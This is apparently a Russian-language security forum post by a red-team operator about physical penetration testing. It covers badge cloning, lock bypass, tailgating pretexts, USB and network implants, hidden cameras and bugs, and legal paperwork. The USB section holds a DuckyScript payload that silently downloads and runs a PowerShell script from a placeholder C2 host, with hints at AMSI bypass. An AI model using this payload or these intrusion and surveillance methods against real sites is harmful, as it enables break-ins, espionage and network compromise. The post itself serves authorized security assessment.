На assessment для финтех-клиента я клонировал бейдж охранника за 40 секунд - Proxmark3 RDV4 считал EM4100 прямо через ткань куртки в курилке. Прошёл через турникет по клону, оказался в серверной через 8 минут после входа в здание. Bash Bunny в USB-порт незалоченной рабочей станции в опенспейсе - reverse shell в корпоративной сети до того, как охрана сменилась. Три уровня физической защиты, шестизначный бюджет на СКУД, ноль срабатываний. Ниже - конкретные инструменты для физического проникновения red team, которые я использую на реальных операциях: модели, цены, ограничения и маппинг на MITRE ATT&CK.
Бизнес-логика: зачем ломать двери при физическом пентесте офиса
Физический вектор - часто самый короткий путь к initial access. Пока blue team мониторит SIEM и тюнит EDR, атакующий входит через дверь. По данным Verizon DBIR (2023), на которые ссылается ISACA в White Paper по Physical Penetration Testing, порядка 74% утечек включали человеческий фактор - социальную инженерию, ошибки или злоупотребления. Физическое проникновение объединяет оба компонента: социалку для прохода и железо для закрепления в сети.Kill chain физической атаки выглядит так: разведка объекта -> обход периметра (замки, СКУД, охрана) -> размещение имплантов или прямой доступ к инфраструктуре -> initial access в сеть -> lateral movement -> цель (domain admin, данные, финансы). В MITRE ATT&CK путь начинается с Hardware Additions (T1200, Initial Access) и может включать Replication Through Removable Media (T1091, Initial Access/Lateral Movement), Exfiltration over USB (T1052.001), Audio Capture (T1123) и Video Capture (T1125) на этапах сбора.
Зачем это клиенту: понять, может ли злоумышленник с бюджетом в $500 на gadgets и $0 на zero-day добраться до критичных активов быстрее, чем через внешний периметр. На моей практике - в большинстве случаев может. И это не технологическая проблема, а управленческая.
Разведка объекта: OSINT и наблюдение перед операцией
Любой physical red team engagement начинается задолго до подхода к зданию. Разведка делится на два этапа: удалённый OSINT и физическое наблюдение.
OSINT до выхода на объект
Google Maps и Яндекс.Карты в режиме спутника дают планировку территории, расположение входов, парковок, мусорных площадок - backdoor entry часто оказывается рядом с зоной разгрузки. LinkedIn и соцсети сотрудников - кладезь фотографий бейджей на ланьярдах: тип карты, цвет, логотип, формат номера. Вакансии на hh.ru тоже работают - формулировка "опыт работы со СКУД Bolid/Parsec/HID" прямо подсказывает производителя системы контроля доступа.Отдельно проверяю публичные тендеры на zakupki.gov.ru: компании указывают модели оборудования вплоть до серийных номеров считывателей. Бесплатная разведка - лучшая разведка.
Физическое наблюдение
Два-три дня наблюдения из автомобиля или кафе напротив: время смены охраны, маршруты курьеров, когда открывается задняя дверь для загрузки. Фиксирую тип камер (поворотные vs фиксированные, ИК-подсветка - значит ночное видение), расстояние между камерами (мёртвые зоны), наличие противовзломных датчиков на окнах первого этажа.Работает если: есть минимум 48 часов на подготовку, объект в черте города с доступными точками для скрытого наблюдения.
Не работает если: объект на закрытой территории с КПП на подъезде, удалённая промзона без кафе и парковок с прямой видимостью.
Lock picking: механический обход замков на пентесте
[Применимо: физический пентест, full-scope red team engagement]
Lock picking - базовый навык оператора на physical security testing. Большинство офисных замков - простые pin tumbler, которые обученный оператор открывает за 30-120 секунд.
Основной набор инструментов:
- Tension wrench + набор отмычек (hook, diamond, rake) - стандартный lockpick set от Peterson или Sparrows стоит $30-80. Качество стали критично: дешёвые китайские наборы ломаются в замочной скважине и создают проблемы с OPSEC
- Bump keys - заготовки под распространённые профили. Один удар резиновым молотком - pin tumbler с низким допуском открыт. Набор обойдётся в $20-40
- Bypass-инструменты: under-door tool (проволока под дверь для нажатия ручки изнутри), shim для навесных замков, traveler hook для panic bar с внешней стороны. Traveler hook на assessment срабатывал чаще отмычек - panic bar на пожарных выходах редко имеет дополнительную фиксацию
Не работает если: замки с sidebar (Medeco, mul-t-lock), disc detainer (Abloy Protec2), электромеханические замки с датчиком взлома, двери с магнитным контактом на сигнализации - откроете механически, но сработает тревога.
На red team операции, где OPSEC критичен, я предпочитаю tailgating или клонирование бейджей. Быстрее и незаметнее, чем стоять у двери с отмычками.
Обход СКУД: клонирование карт доступа с Proxmark3 и Flipper Zero
📚 Часть контента скрыта. Этот материал доступен участникам сообщества с рангом One Level или выше
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме
Получить доступ просто — достаточно зарегистрироваться и проявить активность на форуме
Flipper Zero: карманный мультитул
Компактнее и удобнее для field work, но ограничен: LF читает хорошо (EM4100, HID Prox), HF - только MIFARE Classic с известными ключами. С DESFire не справляется. Стоимость: $170-200. Главное преимущество - выглядит как безобидная игрушка, а не шпионское устройство для пентеста. Плюс умеет Sub-GHz (шлагбаумы, ворота) и ИК (копирование пультов кондиционеров, проекторов). Удобная штука, но Proxmark3 он не заменяет - скорее дополняет.Работает если: карты LF без шифрования (EM4100, HID ProxCard II - до сих пор 60-70% офисных СКУД в России), MIFARE Classic с дефолтными или слабыми ключами.
Не работает если: MIFARE DESFire EV2/EV3 с диверсифицированными ключами, HID iCLASS SE/SEOS, мобильные пропуска через BLE, двухфакторная аутентификация (карта + PIN), системы с мониторингом дубликатов (два бейджа с одним ID в системе одновременно - алерт).
Tailgating и pretexting: социальная инженерия при физическом проникновении
[Применимо: red team engagement с согласованным физическим вектором]
Согласно ISACA White Paper по Physical Penetration Testing, социальная инженерия - то, что отличает физический пентест от любого другого вида тестирования. На практике три метода покрывают большинство сценариев.
Tailgating. Идёшь за сотрудником через дверь с карточным доступом. Руки заняты коробкой, ноутбуком, подносом с кофе - подавляющее большинство людей придержит дверь. Вариация: сам предлагаешь придержать дверь - входящий сотрудник благодарит и не задумывается, что ты вошёл без пропуска. В терминах MITRE ATT&CK это вектор к Hardware Additions (T1200, Initial Access).
Pretexting. Легенда объясняет твоё присутствие и даёт причину проходить в нетипичные зоны:
- IT-подрядчик с тикетом на замену роутера (рабочая одежда, ноутбук, бейдж подрядной организации)
- Аудитор пожарной безопасности (планшет с чек-листом, светоотражающий жилет, камера)
- Курьер с доставкой (фирменная футболка сервиса доставки, коробка, терминал)
Работает если: охрана проверяет наличие пропуска визуально, а не через считыватель; нет mantrap (шлюз с двумя дверями и индивидуальным проходом); сотрудники не проходили awareness-тренинг в последние полгода.
Не работает если: mantrap с индивидуальным проходом, биометрика (отпечаток, распознавание лица), вооружённая охрана с инструкцией проверять каждого, система подсчёта людей на входе/выходе.
USB-дропы и аппаратные импланты: от Rubber Ducky до O.MG Cable
[Применимо: после получения физического доступа к рабочим станциям]Скрытые устройства для взлома через USB - мост между физическим проникновением и initial access в сеть. В MITRE ATT&CK это Hardware Additions (T1200, Initial Access) и Replication Through Removable Media (T1091, Initial Access/Lateral Movement).
Rubber Ducky и Bash Bunny
Hak5 USB Rubber Ducky ($80). Выглядит как обычная флешка, система видит HID-клавиатуру. Выполняет предзагруженный DuckyScript за секунды. Пример payload для reverse shell:
Код:
DELAY 500
GUI r
DELAY 300
REM Примечание: на системах с активным Defender/AMSI данный payload будет заблокирован;
REM требуется AMSI bypass, obfuscation или альтернативный download cradle (certutil, BITS)
STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://C2_IP/s.ps1')"
ENTER
Bash Bunny ($100). Многовекторное устройство: эмулирует клавиатуру, сетевой интерфейс, mass storage. Позволяет развернуть атаку посложнее - от кражи хешей через Responder при эмуляции сетевого адаптера до экстракции файлов.
O.MG Cable
O.MG Cable ($120-180). Выглядит как обычный кабель Lightning или USB-C. Внутри - Wi-Fi имплант с веб-интерфейсом для управления. Оператор подключается к импланту по Wi-Fi с расстояния до 60 метров и отправляет keystroke injection в реальном времени. Идеален для drop-операций: оставляешь "забытый" зарядный кабель на столе жертвы или подменяешь существующий. Модели с exfiltration поддерживают кейлоггинг - Keylogging (T1056.001, Collection/Credential Access).Красивая штука, но и цена кусается. Я добавляю O.MG в набор, когда scope включает долгосрочное закрепление - оставить имплант на неделю и дольше.
Работает если: USB-порты не отключены групповой политикой, DLP не блокирует неизвестные HID, рабочая станция незалочена или автолок больше 5 минут, PowerShell не заблокирован AppLocker/WDAC, не включён Constrained Language Mode.
Не работает если: Device Guard/WDAC блокирует исполнение, USB-порты залиты эпоксидкой (встречал в банках - да, буквально), EDR с мониторингом USB HID детектит Rubber Ducky по аномальной скорости ввода символов.
Скрытое наблюдение: шпионские устройства для red team
На этапе сбора данных (Collection в MITRE ATT&CK) применяются устройства скрытого наблюдения - как для разведки перед основной операцией, так и для пассивного сбора credentials.Миникамеры - Video Capture (T1125). Камеры размером с монету, автономное питание 2-4 часа. Размещаю над клавиатурой для записи вводимых паролей или над кодонаборной панелью СКУД для перехвата PIN. Стоимость: $30-60 за модуль с записью на microSD.
GSM-жучки - Audio Capture (T1123). Активируются звонком, передают аудио. Полезны для подготовки pretexting-сценария: слушаешь, как сотрудники общаются с охраной, запоминаешь имена, внутренние процедуры, пароли от Wi-Fi, которые диктуют по телефону. (Да, в 2025 году пароли всё ещё диктуют по телефону.)
Аппаратные кейлоггеры - Keylogging (T1056.001, Credential Access). USB-переходник между клавиатурой и компьютером, записывает все нажатия. Модели с Wi-Fi отправляют логи удалённо. Стоимость: $50-100. Для пользователя незаметны, но обнаруживаются при физическом осмотре задней стенки системного блока.
Сетевые импланты. LAN Turtle ($60) - вставляется между патч-кордом и Ethernet-портом, прозрачно пропускает трафик и поднимает обратный SSH/VPN-туннель к оператору. Маппинг: Hardware Additions (T1200) + Exfiltration Over Physical Medium (T1052). Питается от PoE или USB, размером с крупный адаптер - прячется за патчпанелью или под столом. Обнаружить можно, но для этого нужно физически проверять каждый порт. Кто это делает регулярно? Вот именно.
Сравнение инструментов для физического пентеста
| Инструмент | Назначение | Цена (USD) | Скрытность | Сложность | Когда НЕ работает |
|---|---|---|---|---|---|
| Proxmark3 RDV4 | Клонирование RFID/NFC | 300-350 | Высокая | Средняя | DESFire EV2+, BLE-пропуска |
| Flipper Zero | RFID/Sub-GHz/IR мультитул | 170-200 | Очень высокая | Низкая | HF с серьёзным шифрованием |
| USB Rubber Ducky | HID keystroke injection | 80 | Высокая | Низкая | USB отключены, EDR |
| O.MG Cable | Удалённая HID-инъекция | 120-180 | Максимальная | Средняя | DLP, контроль USB HID |
| Bash Bunny | Мультивектор HID/ETH/Storage | 100 | Средняя | Средняя | Device Guard, AppLocker |
| LAN Turtle | Сетевой имплант | 60 | Высокая | Средняя | NAC 802.1X, инспекция портов |
| Lockpick set | Вскрытие замков | 30-80 | Низкая при обнаружении | Высокая | Abloy, Medeco, electronic |
| Аппаратный кейлоггер | Перехват ввода | 50-100 | Средняя | Низкая | Беспроводные клавиатуры |
На типичном assessment беру Proxmark3, Rubber Ducky, LAN Turtle и lockpick set - покрывает 90% объектов. O.MG Cable добавляю, когда scope включает долгосрочное закрепление и нужно оставить имплант на неделю и дольше.
OPSEC и юридические рамки physical security testing
Физический пентест - единственный вид тестирования, где оператор рискует физической свободой. Без письменного разрешения клонирование бейджей, вскрытие замков и установка жучков - уголовные составы: ст. 139 УК РФ (нарушение неприкосновенности жилища), ст. 272 (неправомерный доступ к компьютерной информации), ст. 138.1 (незаконные производство, приобретение и/или сбыт специальных технических средств для негласного получения информации). Последняя особенно актуальна для GSM-жучков и скрытых камер. Тут не штраф - тут реальный срок.Обязательный пакет документов:
- Договор на оказание услуг с описанием scope: какие здания, этажи, помещения, какие методы разрешены (lock picking - да, взлом двери с повреждением - нет)
- Get out of jail letter - письмо за подписью уполномоченного лица с ФИО операторов, сроками, фото, контактным номером для проверки 24/7. У каждого оператора - в распечатанном виде. Не на телефоне, не в облаке - бумага
- Список запрещённых действий: не ломать, не выносить реальные данные за периметр, не подвергать сотрудников опасности
После операции - документирование каждого шага с фото и видео доказательствами. Клиент получает не абстрактный чек-лист, а хронологию: "14:32 - клон бейджа, 14:35 - турникет пройден, 14:43 - Bash Bunny в USB, 14:44 - reverse shell получен". Такой формат отчёта не оставляет пространства для возражений "у нас всё защищено".
В большинстве red team engagement, которые я видел в отчётах коллег за последние два года, физический вектор отсутствует. Формально - "не в scope". Фактически - команде неудобно выходить из зоны комфорта Cobalt Strike и идти в реальное здание с отмычками в кармане. При этом на assessment, где физический вектор был согласован, initial access через дверь занимал 20-40 минут, а через внешний периметр - дни.
Проблема шире: до 60-70% офисных СКУД в России всё ещё работают на LF-картах без шифрования. EM4100, HID ProxCard II - считываются за секунды. Компании тратят миллионы на EDR и SOC, а входная дверь открывается клоном, записанным на болванку за 300 рублей. Это не технологический gap - это gap в мышлении. Физическая безопасность не входит в KPI большинства CISO, поэтому её игнорируют.
Пока отрасль не начнёт включать physical security testing в стандартный scope, отчёты будут показывать красивую картину цифровой защиты и полностью упускать вектор, который реальные группировки используют регулярно. Если хочешь отработать путь от аппаратного импланта до shell в контролируемой инфре - на HackerLab (https://hackerlab.pro) есть лаба, где аналогичный initial access нужно довести до закрепления без подсказок.
Последнее редактирование модератором: